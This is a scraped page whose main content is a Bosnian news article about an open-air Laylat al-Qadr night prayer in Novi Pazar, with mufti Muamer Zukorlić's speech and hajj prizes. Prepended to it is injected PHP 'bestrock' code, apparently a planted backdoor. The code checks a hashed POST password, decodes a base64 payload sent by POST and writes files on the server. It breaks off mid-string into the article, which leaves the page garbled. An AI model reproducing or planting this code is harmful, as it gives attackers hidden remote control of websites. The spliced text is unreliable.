function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" Novi Pazar: Hiljade vjernika na noćnom namazu - Medžlis Islamske zajednice Bijeljina

Novi Pazar: Hiljade vjernika na noćnom namazu

Novi Pazar: Hiljade vjernika na noćnom namazu

Hiljade muslimana u Novom Pazaru sinoć su, povodom Lejletu-l-kadra, prisustvovali zajedničkom noćnom namazu u centru grada.

Namaz na na trgu Gazi Isa-bega Ishakovića u Novom Pazaru obavilo je više hiljada vjernika iz cijelog. Noćni namaz su predvodili dvojica hafiza iz Egipta Ibrahim Muselleme i Ahmed Abdulhalim.

Sa skupa, kojim se vratila vjerska tradicija obavljanja namaza na musalli, otvorenm prostoru, pored molitvi upućena je poruka mira, a posebeno je ukazano na neophodnost za redom i jedinstvom muslimana i Bošnjaka Sandžaka na svim poljima.

Muftija Islamske zajednice u Srbiji (IZuS) Muamer Zukorlić u obraćanju okupljenim vjernicima podsjetio je na važnost noći Lejletu-l-kadr kada je počela objava Kur’ana i ocjenio da, “niti je bilo niti će biti važnijeg događaja u ljudskoj historiji od noći Lejletu-l-kadr”.

On je rekao da ova noć večeras u Novom Pazaru nije gluha jer je ovo noć onih koji Allahu žele da budu pokorni i oni su u svom safu otvorenih, očiju i srca.

“Ovo nije samo trg, ovo je musalla, a musalle su naša vjerska i nacionalna tradicija gdje se klanja onog trenutka kada bude toliko džematlija da ne postoji ni jedna džamija koja može to da primi. Zato smo mi sada ovdje, između ponoći i sehura”, kazao je Zukorlić podsjetivši da je namaz u džematu vredniji 27 puta jer Allah dovu jednog džematlije primi za svakog od prisutnih.

Zukorlić je naglasio da “dok je god ovoga safa, ma šta nas pritiskalo, u narodu je dobro”.

“Mislite lijepo o svom narodu, mislite lijepo o ovom džematu jer ako mislimo lijepo onda ćemo jedni drugima iz srca izcijediti ljepotu, a to je ono što nam treba. Ovaj saf potvrđuje kako smo mi i kao vjera, kao vjerska zajednica i nacija opstali”, poručio je on.

Muftija Islamske zajednice u Srbiji je rekao da, koliko god izgledalo da je bošnjački narod razjedinjen, njihova srca su u safovima i da mu samo treba prilika da bude oslobođen, kako je rekao, od raznih faktora koji mu siju razdor.

“Jedinstvo se može praviti samo oko Allahova poziva jer sve ono što je ljudsko je manjkavo i sebično, a sebično je na račun drugoga i onda nema jedinstva”, naveo je Zukorlić ukazavši da je mimo ove noći i mimo ovog safa potrebno da imamo “saf” i na drugim poljima.

“Potrebno je da saf imamo i u islamskoj zajednici i organizaciji vjere, i u privredi, i u kulturi i na nacionalnom polju i inšallah i u politici. Ako se noćas neka dova primi dovite (molite) i za to, za svoje porodice, sve nas, naše jedinstvo i uspjeh svih onih koji žele dobro”, poručio je vjernicima muftija Zukorlić.

Ocjenivši da je noćašnji skup najveći, najljepši, najbrojniji saf (red) koji postoji na sjevernoj hemisferi zemaljske kugle Zukorlić je pozvao vjernike da prvo kao muslimani, a drugo, kao Bošnjaci u Novom Pazaru i Sandžaku budu ponosni.

Zukorlić je vjernicima rekao da zamisle da se večerašnji saf prelije u druge sfere života i da onda ne bi bilo važno da, kako je kazao, “ovaj narod broji četiri, 40 ili 400 miliona”.

“Selam, spas, mir.Ono čemu teže svi ljudi svijeta, i oni koji su na pravom putu i oni koji možda nisu.I oni koji su pod zulumom i koji se danas ubijaju, za njih uputimo dovu. Da nas Allah obaspe milošću i bereketom kaderske noći”, zaključio je muftija.

Na vjerskom skupu koji se već nekoliko godina unazad organizira od strane Islamske zajednice u Srbiji (IZuS) četiri osobe su dobile nagradu – odlazak na hadždž.

Dvije nagrade koje su poklon Škola Kur’ana Časnog, jedna Centra za humanitarni rad Hajrat i Medžlisa IZ-e Novi Pazar izvukao je muftija Muamer Zukorlić.

Ove godine nagrade odlaska na hadždž pripale su ženama Fikreti Šemović, Ismeti Bihorac, Ameli Zekić i Anidi Mavrić.

Tokom ove godine namazu na otvorenom (musalli) prisustvovao je veliki broj žena i djevojaka pa je prostor Trga Isa Beg bio premali za sve prisutne.Tokom jednosatnog namaza zatvoren je bio i pristup obižnjem hotelu Vrbak kao i obližnjim lokalima.

Izvor: AA